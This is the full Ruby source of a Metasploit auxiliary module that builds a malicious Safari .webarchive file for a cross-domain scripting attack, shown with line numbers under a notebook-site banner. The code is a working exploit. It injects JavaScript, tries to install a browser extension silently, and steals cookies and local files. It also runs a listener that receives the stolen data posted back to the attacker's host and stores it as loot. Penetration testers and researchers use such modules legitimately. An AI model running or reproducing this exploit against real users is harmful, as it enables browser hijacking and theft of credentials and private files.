Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'uri'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::FILEFORMAT
10
  include Msf::Exploit::Remote::HttpServer::HTML
11
  include Msf::Exploit::Format::Webarchive
12
  include Msf::Auxiliary::Report
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'Mac OS X Safari .webarchive File Format UXSS',
17
      'Description'    => %q{
18
        Generates a .webarchive file for Mac OS X Safari that will attempt to
19
        inject cross-domain Javascript (UXSS), silently install a browser
20
        extension, collect user information, steal the cookie database,
21
        and steal arbitrary local files.
22

23
        When opened on the target machine the webarchive file must not have the
24
        quarantine attribute set, as this forces the webarchive to execute in a
25
        sandbox.
26
      },
27
      'License'        => MSF_LICENSE,
28
      'Author'         => 'joev',
29
      'References'     =>
30
        [
31
          ['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
32
        ],
33
      'DisclosureDate' => '2013-02-22',
34
      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
35
      'PassiveActions' => [ 'WebServer' ],
36
      'DefaultAction'  => 'WebServer'))
37
  end
38

39
  def run
40
    if datastore["URIPATH"].blank?
41
      datastore["URIPATH"] = "/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)
42
    end
43

44
    print_status("Creating '#{datastore['FILENAME']}' file...")
45
    file_create(webarchive_xml)
46
    exploit
47
  end
48

49
  def on_request_uri(cli, request)
50
    if request.method =~ /post/i
51
      data_str = request.body.to_s
52
      begin
53
        data = JSON::parse(data_str || '')
54
        file = record_data(data, cli)
55
        send_response_html(cli, '')
56
        print_good "#{data_str.length} chars received and stored to #{file}"
57
      rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
58
        file = record_data(data_str, cli)
59
        print_error "Invalid JSON stored in #{file}"
60
        send_response_html(cli, '')
61
      end
62
    else
63
      send_response(cli, webarchive_xml, {
64
        'Content-Type' => 'application/x-webarchive',
65
        'Content-Disposition' => "attachment; filename=\"#{datastore['FILENAME']}\""
66
      })
67
    end
68
  end
69

70
  # @param [Hash] data the data to store in the log
71
  # @return [String] filename where we are storing the data
72
  def record_data(data, cli)
73
    if data.is_a? Hash
74
      file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
75
    end
76
    store_loot(
77
      file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
78
    )
79
  end
80

81
  # @return [String] formatted http/https URL of the listener
82
  def backend_url
83
    proto = (datastore["SSL"] ? "https" : "http")
84
    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
85
    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
86
    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
87
  end
88

89
  def message
90
    super + (datastore['INSTALL_EXTENSION'] ? " <a href='javascript:void(0)'>Click here to continue.</a>" + popup_js : '')
91
  end
92

93
  def popup_js
94
    wrap_with_script do
95
      %Q|
96
        window.onclick = function() {
97
          window.open('data:text/html,<script>opener.postMessage("EXT", "*");window.location="#{apple_extension_url}";<\\/script>');
98
        };
99
      |
100
    end
101
  end
102

103

104
end
105

106